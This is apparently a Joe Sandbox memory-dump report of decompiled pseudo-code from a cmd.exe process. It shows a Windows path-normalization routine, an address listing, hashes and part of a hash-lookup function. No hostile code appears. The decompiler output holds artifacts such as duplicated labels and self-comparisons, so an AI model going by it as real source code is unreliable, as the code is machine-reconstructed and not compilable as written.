									_t328 = _v112;
								}
								goto L122;
							} else {
								_t425 = _t443;
								_t336 =  *(_t425 + 4);
								_t407 =  *_t425 & 0x0000ffff;
								if(_t407 < 2) {
									L17:
									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
										_t337 = 5;
									} else {
										if(_t407 < 6) {
											L98:
											_t337 = 3;
											L23:
											 *_v108 = _t337;
											_t409 = 0;
											_v72 = 0;
											_v68 = 0;
											_v64 = 0;
											_v84 = 0;
											_v41 = 0;
											_t445 = 0;
											_v76 = 0;
											_v8 = 0;
											if(_t337 != 2) {
												_t338 = _t337 - 1;
												if(_t338 > 6) {
													L164:
													_t446 = 0;
													_v64 = 0;
													_t439 = _v92;
													goto L59;
												}
												switch( *((intOrPtr*)(_t338 * 4 +  &M036E749C))) {
													case 0:
														__ecx = 0;
														__eflags = 0;
														_v124 = 0;
														__esi = 2;
														while(1) {
															_v100 = __esi;
															__eflags = __esi - __edi;
															if(__esi >= __edi) {
																break;
															}
															__eax =  *(__edx + 4);
															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
															__eflags = __eax - 0x5c;
															if(__eax == 0x5c) {
																L140:
																__ecx = __ecx + 1;
																_v124 = __ecx;
																__eflags = __ecx - 2;
																if(__ecx == 2) {
																	break;
																}
																L141:
																__esi = __esi + 1;
																continue;
															}
															__eflags = __eax - 0x2f;
															if(__eax != 0x2f) {
																goto L141;
															}
															goto L140;
														}
														__eax = __esi;
														_v80 = __esi;
														__eax =  *(__edx + 4);
														_v68 =  *(__edx + 4);
														__eax = __esi + __esi;
														_v72 = __ax;
														__eax =  *(__edx + 2) & 0x0000ffff;
														_v70 = __ax;
														_v76 = __esi;
														goto L80;
													case 1:
														goto L164;
													case 2:
														__eax = E036C52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
														} else {
															__ebx = __eax + 0xc;
														}
														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
														__eax = L036D2600( *( *(__ebx + 4)) & 0x0000ffff);
														__si = __ax;
														_v88 =  *(_v88 + 4);
														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
														__eax = L036D2600( *( *(_v88 + 4)) & 0x0000ffff);
														_v54 = __ax;
														__eflags = __ax - __ax;
														if(__eflags != 0) {
															__cx = __ax;
															L03744735(__ecx, __edx, __eflags) = 0x3d;
															_v40 = __ax;
															__si = _v54;
															_v38 = __si;
															_v36 = 0x3a;
															 &_v40 =  &_v136;
															E0370BB40(__ecx,  &_v136,  &_v40) =  &_v52;
															__eax =  &_v136;
															__eax = E036F2010(__ecx, 0,  &_v136,  &_v52);
															__eflags = __eax;
															if(__eax >= 0) {
																__ax = _v52;
																_v56 = __eax;
																__edx = __ax & 0x0000ffff;
																__ecx = __edx;
																__ecx = __edx >> 1;
																_v100 = __ecx;
																__eflags = __ecx - 3;
																if(__ecx <= 3) {
																	L155:
																	__ebx = _v48;
																	L156:
																	_v72 = __ax;
																	goto L119;
																}
																__eflags = __ecx - _v92;
																if(__ecx >= _v92) {
																	goto L155;
																}
																__esi = 0x5c;
																__ebx = _v48;
																 *(__ebx + __ecx * 2) = __si;
																__eax = __edx + 2;
																_v56 = __edx + 2;
																_v52 = __ax;
																goto L156;
															}
															__eflags = __eax - 0xc0000023;
															if(__eax != 0xc0000023) {
																__eax = 0;
																_v52 = __ax;
																_v40 = __si;
																_v38 = 0x5c003a;
																_v34 = __ax;
																__edx =  &_v40;
																__ecx =  &_v52;
																L03744658(__ecx,  &_v40) = 8;
																_v72 = __ax;
																__ebx = _v48;
																__ax = _v52;
																_v56 = 8;
																goto L119;
															}
															__ax = _v52;
															_v56 = __eax;
															__eax = __ax & 0x0000ffff;
															__eax = (__ax & 0x0000ffff) + 2;
															_v64 = __eax;
															__eflags = __eax - 0xffff;
															if(__eax <= 0xffff) {
																_v72 = __ax;
																__ebx = _v48;
																goto L119;
															}
															__esi = 0;
															_v64 = 0;
															__ebx = _v48;
															__edi = _v92;
															goto L58;
														} else {
															__eax =  *__ebx;
															_v72 =  *__ebx;
															__eax =  *(__ebx + 4);
															_v68 =  *(__ebx + 4);
															__edx =  &_v72;
															__ecx =  &_v52;
															__eax = E036F9BC6(__ecx,  &_v72);
															__ebx = _v48;
															__eax = _v52 & 0x0000ffff;
															_v56 = _v52 & 0x0000ffff;
															L119:
															__eax = 3;
															_v80 = 3;
															__esi = 2;
															_v76 = 2;
															__edx = _v88;
															goto L25;
														}
													case 3:
														__eax = E036C52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
															__eflags = __ebx;
															__esi = _v76;
														} else {
															__ebx = __eax + 0xc;
														}
														__ecx = __ebx;
														__eax = L036C83AE(__ebx);
														_v80 = __eax;
														__ecx =  *__ebx;
														_v72 =  *__ebx;
														__ecx =  *(__ebx + 4);
														_v68 = __ecx;
														__eflags = __eax - 3;
														if(__eax == 3) {
															__eax = 4;
															_v72 = __ax;
														} else {
															__ecx = __eax + __eax;
															_v72 = __cx;
														}
														goto L80;
													case 4:
														_t340 = E036C52A5(0);
														_v84 = _t340;
														_v41 = 1;
														__eflags = _t340;
														if(_t340 == 0) {
															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
															_t445 = _v76;
														} else {
															_t428 = _t340 + 0xc;
															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
														}
														_v72 =  *_t428;
														_v68 = _t428[2];
														_v80 = L036C83AE(_t428);
														L80:
														E036F9BC6( &_v52,  &_v72);
														_t386 = _v48;
														_v56 = _v52 & 0x0000ffff;
														_t425 = _v88;
														goto L25;
													case 5:
														__eax = 4;
														_v80 = 4;
														__esi = 4;
														_v76 = 4;
														__eflags = __edi - 4;
														if(__edi < 4) {
															__esi = __edi;
															_v76 = __esi;
														}
														__eax =  *0x36a1080;
														_v72 =  *0x36a1080;
														__eax =  *0x36a1084;
														_v68 =  *0x36a1084;
														__edx =  &_v72;
														__ecx =  &_v52;
														__eax = E036F9BC6(__ecx,  &_v72);
														__eax = _v52 & 0x0000ffff;
														_v56 = __eax;
														__edx = _v88;
														__ebx = _v48;
														__eflags = __eax - 6;
														if(__eax >= 6) {
															__eax =  *(__edx + 4);
															__ax =  *((intOrPtr*)(__eax + 4));
															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
														}
														__eax = _v108;
														__eflags =  *_v108 - 7;
														if( *_v108 == 7) {
															_v57 = 0;
														}
														goto L25;
												}
											} else {
												_v80 = 3;
												L25:
												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
												_v104 = _t349;
												_t415 = _t349 + 2;
												if(_t415 > _v116) {
													if(_t435 <= 1) {
														if( *( *(_t425 + 4)) != 0x2e) {
															goto L72;
														}
														if(_t435 != 1) {
															asm("sbb esi, esi");
															_t446 =  !_t445 & _v104;
															_v64 = _t446;
															_t439 = _v92;
															L58:
															_t409 = _v84;
															L59:
															_v8 = 0xfffffffe;
															E036E746D(_t386, _t409, _t439, _t446);
															_t317 = _t446;
															L60:
															 *[fs:0x0] = _v20;
															_pop(_t436);
															_pop(_t444);
															_pop(_t387);
															return E0370B640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
														}
														_t417 = _v72;
														if(_t417 != 8) {
															if(_v116 >= (_t417 & 0x0000ffff)) {
																_t352 = _v56;
																_t418 = _t352 & 0x0000ffff;
																_v104 = _t418;
																_t419 = _t418 >> 1;
																_v100 = _t419;
																if(_t419 != 0) {
																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
																		_t352 = _v104 + 0xfffffffe;
																		_v56 = _t352;
																		_v52 = _t352;
																	}
																}
																L27:
																_t420 = 0;
																_v100 = 0;
																L28:
																L28:
																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
																	goto L69;
																} else {
																	_t422 = (_v56 & 0x0000ffff) >> 1;
																	_v96 = _t422;
																}
																while(_t445 < _t435) {
																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																	if(_t363 == 0x5c) {
																		L44:
																		if(_t422 == 0) {
																			L46:
																			 *(_t386 + _t422 * 2) = 0x5c;
																			_t422 = _t422 + 1;
																			_v96 = _t422;
																			L43:
																			_t445 = _t445 + 1;
																			_v76 = _t445;
																			continue;
																		}
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			goto L43;
																		}
																		goto L46;
																	}
																	_t365 = _t363 - 0x2e;
																	if(_t365 == 0) {
																		_t126 = _t445 + 1; // 0x2
																		_t366 = _t126;
																		_v104 = _t366;
																		if(_t366 == _t435) {
																			goto L43;
																		}
																		_t367 =  *(_t425 + 4);
																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
																		_v108 = _t440;
																		_t435 = _v120;
																		if(_t440 != 0x5c) {
																			if(_v108 == 0x2f) {
																				goto L83;
																			}
																			if(_v108 != 0x2e) {
																				L35:
																				while(_t445 < _t435) {
																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
																					if(_t369 == 0x5c || _t369 == 0x2f) {
																						if(_t445 < _t435) {
																							if(_t422 >= 2) {
																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
																										_t422 = _t422 - 1;
																										_v96 = _t422;
																									}
																								}
																							}
																						}
																						break;
																					} else {
																						 *(_t386 + _t422 * 2) = _t369;
																						_t422 = _t422 + 1;
																						_v96 = _t422;
																						_t445 = _t445 + 1;
																						_v76 = _t445;
																						continue;
																					}
																				}
																				_t445 = _t445 - 1;
																				_v76 = _t445;
																				goto L43;
																			}
																			_t155 = _t445 + 2; // 0x3
																			_t425 = _v88;
																			if(_t155 == _t435) {
																				while(1) {
																					L103:
																					if(_t422 < _v80) {
																						break;
																					}
																					 *(_t386 + _t422 * 2) = 0;
																					_t425 = _v88;
																					if( *(_t386 + _t422 * 2) != 0x5c) {
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																						continue;
																					} else {
																						goto L105;
																					}
																					while(1) {
																						L105:
																						if(_t422 < _v80) {
																							goto L180;
																						}
																						 *(_t386 + _t422 * 2) = 0;
																						_t435 = _v120;
																						if( *(_t386 + _t422 * 2) == 0x5c) {
																							if(_t422 < _v80) {
																								goto L180;
																							}
																							L110:
																							_t445 = _t445 + 1;
																							_v76 = _t445;
																							goto L43;
																						}
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																					}
																					break;
																				}
																				L180:
																				_t422 = _t422 + 1;
																				_v96 = _t422;
																				goto L110;
																			}
																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
																			if(_t375 != 0x5c) {
																				if(_t375 != 0x2f) {
																					goto L35;
																				}
																			}
																			goto L103;
																		}
																		L83:
																		_t445 = _v104;
																		_v76 = _t445;
																		goto L43;
																	}
																	if(_t365 == 1) {
																		goto L44;
																	} else {
																		goto L35;
																	}
																}
																_t449 = _v80;
																if(_v57 != 0) {
																	if(_t422 > _t449) {
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			_t422 = _t422 - 1;
																			_v96 = _t422;
																		}
																	}
																}
																_t439 = _v92;
																if(_t422 >= _v92) {
																	L52:
																	if(_t422 == 0) {
																		L56:
																		_t425 = _t422 + _t422;
																		_v52 = _t425;
																		if(_v112 != 0) {
																			_t357 = _t422;
																			while(1) {
																				_v100 = _t357;
																				if(_t357 == 0) {
																					break;
																				}
																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
																					break;
																				}
																				_t357 = _t357 - 1;
																			}
																			if(_t357 >= _t422) {
																				L113:
																				 *_v112 = 0;
																				goto L57;
																			}
																			if(_t357 < _t449) {
																				goto L113;
																			}
																			 *_v112 = _t386 + _t357 * 2;
																		}
																		L57:
																		_t446 = _t425 & 0x0000ffff;
																		_v64 = _t446;
																		goto L58;
																	}
																	_t422 = _t422 - 1;
																	_v96 = _t422;
																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
																	if(_t360 == 0x20) {
																		goto L51;
																	}
																	if(_t360 == 0x2e) {
																		goto L51;
																	}
																	_t422 = _t422 + 1;
																	_v96 = _t422;
																	goto L56;
																} else {
																	L51:
																	 *(_t386 + _t422 * 2) = 0;
																	goto L52;
																}
																L69:
																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
																}
																_t420 = _t420 + 1;
																_v100 = _t420;
																_t352 = _v56;
																goto L28;
															}
															_t446 = _t417 & 0x0000ffff;
															_v64 = _t446;
															_t439 = _v92;
															goto L58;
														}
														if(_v116 > 8) {
															goto L26;
														}
														_t446 = 0xa;
														_v64 = 0xa;
														_t439 = _v92;
														goto L58;
													}
													L72:
													if(_t415 > 0xffff) {
														_t446 = 0;
													}
													_v64 = _t446;
													_t439 = _v92;
													goto L58;
												}
												L26:
												_t352 = _v56;
												goto L27;
											}
										}
										_t379 = _t336[2] & 0x0000ffff;
										if(_t379 != 0x5c) {
											if(_t379 == 0x2f) {
												goto L22;
											}
											goto L98;
										}
										L22:
										_t337 = 2;
									}
									goto L23;
								}
								_t450 =  *_t336 & 0x0000ffff;
								if(_t450 == 0x5c || _t450 == 0x2f) {
									if(_t407 < 4) {
										L132:
										_t337 = 4;
										goto L23;
									}
									_t451 = _t336[1] & 0x0000ffff;
									if(_t451 != 0x5c) {
										if(_t451 == 0x2f) {
											goto L87;
										}
										goto L132;
									}
									L87:
									if(_t407 < 6) {
										L135:
										_t337 = 1;
										goto L23;
									}
									_t452 = _t336[2] & 0x0000ffff;
									if(_t452 != 0x2e) {
										if(_t452 == 0x3f) {
											goto L89;
										}
										goto L135;
									}
									L89:
									if(_t407 < 8) {
										L134:
										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
										goto L23;
									}
									_t384 = _t336[3] & 0x0000ffff;
									if(_t384 != 0x5c) {
										if(_t384 == 0x2f) {
											goto L91;
										}
										goto L134;
									}
									L91:
									_t337 = 6;
									goto L23;
								} else {
									goto L17;
								}
							}
						}
					}
					goto L124;
				}
			}

0x036e6e30
0x036e6e35
0x036e6e37
0x036e6e3c
0x036e6e47
0x036e6e4b
0x036e6e50
0x036e6e53
0x036e6e55
0x036e6e5b
0x036e6e5f
0x036e6e65
0x036e6e68
0x036e6e6a
0x036e6e6d
0x036e6e70
0x036e6e73
0x036e6e76
0x036e6e79
0x036e6e7c
0x036e6e7f
0x036e6e84
0x036e710f
0x036e710f
0x036e6e8c
0x036e6e8e
0x036e6e8e
0x036e6e97
0x0372f5d3
0x0372f5d3
0x036e6e9d
0x036e6ea3
0x036e6eaa
0x036e6ead
0x036e6eb2
0x036e6eb4
0x036e6eb7
0x036e7466
0x036e7466
0x00000000
0x036e6ebd
0x036e6ebd
0x036e6ec4
0x036e6eca
0x036e6ecc
0x036e6ecf
0x036e6ed2
0x036e6ede
0x0372f5df
0x0372f5e0
0x00000000
0x0372f5e0
0x036e6ee6
0x00000000
0x00000000
0x036e6eec
0x036e6ef3
0x036e7181
0x036e6f02
0x036e6f02
0x036e6f02
0x036e6f0b
0x036e6f0d
0x036e6f10
0x036e6f17
0x036e6f21
0x036e6f24
0x036e6f2d
0x036e6f31
0x036e6f36
0x036e6f3d
0x036e7413
0x036e7416
0x036e7419
0x036e741c
0x036e7421
0x036e742b
0x036e742b
0x036e742e
0x036e7439
0x0372f60b
0x0372f60b
0x0372f615
0x0372f619
0x036e743f
0x036e7447
0x036e7454
0x036e745a
0x036e745f
0x036e745f
0x00000000
0x036e7439
0x036e7425
0x0372f5e9
0x0372f5ed
0x0372f5f4
0x00000000
0x00000000
0x0372f5fd
0x00000000
0x00000000
0x0372f603
0x0372f603
0x00000000
0x036e6f43
0x036e6f43
0x036e6f45
0x036e6f48
0x036e6f4e
0x036e6f65
0x036e6f68
0x036e721f
0x036e6f83
0x036e6f86
0x036e72dc
0x036e72dc
0x036e6f9e
0x036e6fa1
0x036e6fa3
0x036e6fa5
0x036e6fa8
0x036e6fab
0x036e6fae
0x036e6fb1
0x036e6fb4
0x036e6fb6
0x036e6fb9
0x036e6fbf
0x036e718a
0x036e718e
0x0372f831
0x0372f831
0x0372f833
0x0372f836
0x00000000
0x0372f836
0x036e7194
0x00000000
0x0372f658
0x0372f658
0x0372f65a
0x0372f65d
0x0372f662
0x0372f662
0x0372f665
0x0372f667
0x00000000
0x00000000
0x0372f669
0x0372f66c
0x0372f670
0x0372f673
0x0372f67a
0x0372f67a
0x0372f67b
0x0372f67e
0x0372f681
0x00000000
0x00000000
0x0372f683
0x0372f683
0x00000000
0x0372f683
0x0372f675
0x0372f678
0x00000000
0x00000000
0x00000000
0x0372f678
0x0372f686
0x0372f688
0x0372f68b
0x0372f68e
0x0372f691
0x0372f694
0x0372f698
0x0372f69c
0x0372f6a0
0x00000000
0x00000000
0x00000000
0x00000000
0x036e7397
0x036e739c
0x036e739f
0x036e73a3
0x036e73a5
0x0372f6bb
0x0372f6c1
0x0372f6c4
0x036e73ab
0x036e73ab
0x036e73ab
0x036e73b1
0x036e73b5
0x036e73ba
0x036e73c0
0x036e73c3
0x036e73c7
0x036e73cc
0x036e73d0
0x036e73d3
0x0372f6cc
0x0372f6d4
0x0372f6d9
0x0372f6dd
0x0372f6e1
0x0372f6e5
0x0372f6f0
0x0372f6fc
0x0372f700
0x0372f709
0x0372f70e
0x0372f710
0x0372f784
0x0372f788
0x0372f78b
0x0372f78e
0x0372f790
0x0372f792
0x0372f795
0x0372f798
0x0372f7b7
0x0372f7b7
0x0372f7ba
0x0372f7ba
0x00000000
0x0372f7ba
0x0372f79a
0x0372f79d
0x00000000
0x00000000
0x0372f79f
0x0372f7a4
0x0372f7a7
0x0372f7ab
0x0372f7ae
0x0372f7b1
0x00000000
0x0372f7b1
0x0372f712
0x0372f717
0x0372f74c
0x0372f74e
0x0372f752
0x0372f756
0x0372f75d
0x0372f761
0x0372f764
0x0372f76c
0x0372f771
0x0372f775
0x0372f778
0x0372f77c
0x00000000
0x0372f77c
0x0372f719
0x0372f71d
0x0372f720
0x0372f723
0x0372f726
0x0372f729
0x0372f72e
0x0372f740
0x0372f744
0x00000000
0x0372f744
0x0372f730
0x0372f732
0x0372f735
0x0372f738
0x00000000
0x036e73d9
0x036e73d9
0x036e73db
0x036e73de
0x036e73e1
0x036e73e4
0x036e73e7
0x036e73ea
0x036e73ef
0x036e73f2
0x036e73f6
0x036e73f9
0x036e73f9
0x036e73fe
0x036e7401
0x036e7406
0x036e7409
0x00000000
0x036e7409
0x00000000
0x0372f7c5
0x0372f7ca
0x0372f7cd
0x0372f7d1
0x0372f7d3
0x0372f7da
0x0372f7e0
0x0372f7e3
0x0372f7e3
0x0372f7e6
0x0372f7d5
0x0372f7d5
0x0372f7d5
0x0372f7e9
0x0372f7eb
0x0372f7f0
0x0372f7f3
0x0372f7f5
0x0372f7f8
0x0372f7fb
0x0372f7fe
0x0372f801
0x0372f80f
0x0372f814
0x0372f803
0x0372f803
0x0372f806
0x0372f806
0x00000000
0x00000000
0x036e719d
0x036e71a2
0x036e71a5
0x036e71a9
0x036e71ab
0x0372f826
0x0372f829
0x036e71b1
0x036e71b1
0x036e71ba
0x036e71ba
0x036e71bf
0x036e71c5
0x036e71cf
0x036e71d2
0x036e71d8
0x036e71dd
0x036e71e4
0x036e71e7
0x00000000
0x00000000
0x036e7275
0x036e727a
0x036e727d
0x036e727f
0x036e7282
0x036e7284
0x0372f6a8
0x0372f6aa
0x0372f6aa
0x036e728a
0x036e728f
0x036e7292
0x036e7297
0x036e729a
0x036e729d
0x036e72a0
0x036e72a5
0x036e72a9
0x036e72ac
0x036e72af
0x036e72b2
0x036e72b5
0x036e72b7
0x036e72ba
0x036e72be
0x036e72be
0x036e72c2
0x036e72c5
0x036e72c8
0x0372f6b2
0x0372f6b2
0x00000000
0x00000000
0x036e6fc5
0x036e6fc5
0x036e6fcc
0x036e6fd8
0x036e6fda
0x036e6fdd
0x036e6fe3
0x036e7162
0x0372f845
0x00000000
0x00000000
0x0372f84e
0x0372f8c4
0x0372f8c8
0x0372f8cb
0x0372f8ce
0x036e70e0
0x036e70e0
0x036e70e3
0x036e70e3
0x036e70ea
0x036e70ef
0x036e70f1
0x036e70f4
0x036e70fc
0x036e70fd
0x036e70fe
0x036e710c
0x036e710c
0x0372f850
0x0372f858
0x0372f87a
0x0372f88a
0x0372f88d
0x0372f890
0x0372f893
0x0372f895
0x0372f898
0x0372f8a4
0x0372f8ad
0x0372f8b0
0x0372f8b3
0x0372f8b3
0x0372f8a4
0x036e6fec
0x036e6fec
0x036e6fee
0x00000000
0x036e6ff1
0x036e6ff8
0x00000000
0x036e6ffe
0x036e7004
0x036e7006
0x036e7006
0x036e7010
0x036e7017
0x036e701e
0x036e7072
0x036e7074
0x036e707e
0x036e7083
0x036e7087
0x036e7088
0x036e706c
0x036e706c
0x036e706d
0x00000000
0x036e706d
0x036e707c
0x00000000
0x00000000
0x00000000
0x036e707c
0x036e7020
0x036e7023
0x036e71ef
0x036e71ef
0x036e71f2
0x036e71f7
0x00000000
0x00000000
0x036e71fd
0x036e7200
0x036e7205
0x036e720b
0x036e720e
0x036e72eb
0x00000000
0x00000000
0x036e72f6
0x00000000
0x036e7030
0x036e7037
0x036e703e
0x036e7055
0x036e705a
0x036e7062
0x0372f908
0x0372f90e
0x0372f90f
0x0372f90f
0x0372f908
0x036e7062
0x036e705a
0x00000000
0x036e7045
0x036e7045
0x036e7049
0x036e704a
0x036e704d
0x036e704e
0x00000000
0x036e704e
0x036e703e
0x036e7068
0x036e7069
0x00000000
0x036e7069
0x036e72fc
0x036e7301
0x036e7304
0x036e7314
0x036e7314
0x036e7319
0x00000000
0x00000000
0x036e7325
0x036e732d
0x036e7330
0x036e7356
0x036e7357
0x00000000
0x00000000
0x00000000
0x00000000
0x036e7332
0x036e7332
0x036e7337
0x00000000
0x00000000
0x036e7343
0x036e734b
0x036e734e
0x036e7361
0x00000000
0x00000000
0x036e7367
0x036e7367
0x036e7368
0x00000000
0x036e7368
0x036e7350
0x036e7351
0x036e7351
0x00000000
0x036e7332
0x0372f8f9
0x0372f8f9
0x0372f8fa
0x00000000
0x0372f8fa
0x036e7306
0x036e730e
0x0372f8ee
0x00000000
0x00000000
0x0372f8f4
0x00000000
0x036e730e
0x036e7214
0x036e7214
0x036e7217
0x00000000
0x036e7217
0x036e702c
0x00000000
0x00000000
0x00000000
0x00000000
0x036e702c
0x036e708d
0x036e7094
0x036e7098
0x036e70a0
0x036e738c
0x036e738d
0x036e738d
0x036e70a0
0x036e7098
0x036e70a6
0x036e70ab
0x036e70b3
0x036e70b5
0x036e70cd
0x036e70cd
0x036e70d0
0x036e70d8
0x036e711a
0x036e711c
0x036e711c
0x036e7121
0x00000000
0x00000000
0x036e7129
0x00000000
0x00000000
0x036e712b
0x036e712b
0x036e7130
0x036e737e
0x036e7381
0x00000000
0x036e7381
0x036e7138
0x00000000
0x00000000
0x036e7144
0x036e7144
0x036e70da
0x036e70da
0x036e70dd
0x00000000
0x036e70dd
0x036e70b7
0x036e70b8
0x036e70bb
0x036e70c2
0x00000000
0x00000000
0x036e70c7
0x00000000
0x00000000
0x036e70c9
0x036e70ca
0x00000000
0x036e70ad
0x036e70ad
0x036e70af
0x00000000
0x036e70af
0x036e7148
0x036e714d
0x0372f8e2
0x0372f8e2
0x036e7153
0x036e7154
0x036e7157
0x00000000
0x036e7157
0x0372f87c
0x0372f87f
0x0372f882
0x00000000
0x0372f882
0x0372f85e
0x00000000
0x00000000
0x0372f864
0x0372f869
0x0372f86c
0x00000000
0x0372f86c
0x036e7168
0x036e7170
0x0372f8d6
0x0372f8d6
0x036e7176
0x036e7179
0x00000000
0x036e7179
0x036e6fe9
0x036e6fe9
0x00000000
0x036e6fe9
0x036e6fbf
0x036e6f8c
0x036e6f93
0x036e72d6
0x00000000
0x00000000
0x00000000
0x036e72d6
0x036e6f99
0x036e6f99
0x036e6f99
0x00000000
0x036e6f68
0x036e6f50
0x036e6f56
0x036e722c
0x0372f629
0x0372f629
0x00000000
0x0372f629
0x036e7232
0x036e7239
0x0372f623
0x00000000
0x00000000
0x00000000
0x0372f623
0x036e723f
0x036e7242
0x0372f64e
0x0372f64e
0x00000000
0x0372f64e
0x036e7248
0x036e724f
0x036e7373
0x00000000
0x00000000
0x00000000
0x036e7379
0x036e7255
0x036e7258
0x0372f63c
0x0372f648
0x00000000
0x0372f648
0x036e725e
0x036e7265
0x0372f636
0x00000000
0x00000000
0x00000000
0x0372f636
0x036e726b
0x036e726b
0x00000000
0x00000000
0x00000000
0x00000000
0x036e6f56
0x036e6f3d
0x036e6ed2
0x00000000
0x036e6ec4

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb614ffda5a39dba1a95be7c9e80389717f7206709f4a1024c65a2b77a977fa1
Instruction ID: 292407f1b0edce8f8d67534008820a0fe2fe122da6fd88d23a245a3e07a2248c
Opcode Fuzzy Hash: fb614ffda5a39dba1a95be7c9e80389717f7206709f4a1024c65a2b77a977fa1
Instruction Fuzzy Hash: 5C029E71D16219CFCB28CF98C5946ADFBB1EF44701F29402EE816EB390E770999ACB54

Uniqueness

Uniqueness Score: -1.00%

Function 0379DFCE Relevance: .5, Instructions: 458
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E0379DFCE(intOrPtr __ecx, signed int __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t173;
				signed int _t175;
				unsigned int _t177;
				intOrPtr _t178;
				signed int _t201;
				unsigned int _t223;
				unsigned int _t240;
				signed int _t258;
				intOrPtr _t269;
				signed int _t270;
				signed char _t271;
				signed char _t273;
				signed int _t274;
				intOrPtr* _t281;
				signed int* _t284;
				signed char _t292;
				signed int _t293;
				signed char _t300;
				signed char _t305;
				intOrPtr _t314;
				signed int _t315;
				signed int _t319;
				signed int _t323;
				intOrPtr _t326;
				signed char _t328;
				signed int _t334;
				signed char _t335;
				void* _t365;
				signed int _t368;
				signed int* _t373;
				signed int _t377;
				signed int _t378;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				unsigned int _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				void* _t390;
				signed int _t393;
				signed int _t406;
				signed int _t407;

				_t367 = __edx;
				_v8 =  *0x37bd360 ^ _t407;
				_t269 = __ecx;
				_v44 = __ecx;
				if(__ecx == 0) {
					L80:
					_t270 = 0;
					L81:
					return E0370B640(_t270, _t270, _v8 ^ _t407, _t367, _t383, _t392);
				}
				_t383 = _a4;
				if(_t383 == 0 || __edx == 0) {
					goto L80;
				} else {
					_v56 = _t383;
					_t393 = 0x4cb2f;
					_t384 = _t383 << 2;
					_v52 = __edx;
					if(_t384 < 8) {
						L7:
						_t385 = _t384 - 1;
						if(_t385 == 0) {
							L20:
							_t392 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							L21:
							_t15 = _t269 + 0x18; // 0x37b8680
							_v48 = _t15;
							L036EFAD0(_t15);
							_t17 = _t269 + 0xc; // 0x37b8674
							_t367 = _t17;
							_t383 = 0;
							_v20 = _t367;
							_t271 = 0;
							while(1) {
								L22:
								_t19 = _t367 + 4; // 0x0
								_t173 =  *_t19;
								_v12 = _v12 | 0xffffffff;
								_v12 = _v12 << (_t173 & 0x0000001f);
								_t300 = _t392 & _v12;
								_v16 = _t300;
								_v16 = _v16 >> 0x18;
								_v28 = _t300;
								_v28 = _v28 >> 0x10;
								_v24 = _t300;
								_v24 = _v24 >> 8;
								_v32 = _t300;
								if(_t271 != 0) {
									goto L25;
								}
								_t240 = _t173 >> 5;
								_v36 = _t240;
								if(_t240 == 0) {
									_t270 = _t383;
									L34:
									if(_t270 == 0) {
										L38:
										_t272 = _v48;
										E036EFA00(_v48, _t300, _t383, _v48);
										_t367 =  &_v56;
										_t175 = E0379E62A(_v44,  &_v56, _t392);
										_v36 = _t175;
										if(_t175 != 0) {
											E036E2280(_t175, _t272);
											_t273 = _t383;
											do {
												_t368 = _v20;
												_v12 = _v12 | 0xffffffff;
												_t177 =  *(_t368 + 4);
												_v12 = _v12 << (_t177 & 0x0000001f);
												_t305 = _v12 & _t392;
												_v24 = _t305;
												_v24 = _v24 >> 0x18;
												_v28 = _t305;
												_v28 = _v28 >> 0x10;
												_v16 = _t305;
												_v16 = _v16 >> 8;
												_v40 = _t305;
												if(_t273 != 0) {
													while(1) {
														L44:
														_t273 =  *_t273;
														if((_t273 & 0x00000001) != 0) {
															break;
														}
														if(_t305 == ( *(_t273 + 4) & _v12)) {
															L48:
															if(_t273 == 0) {
																L55:
																_t178 = _v44;
																_t274 =  *(_t368 + 4);
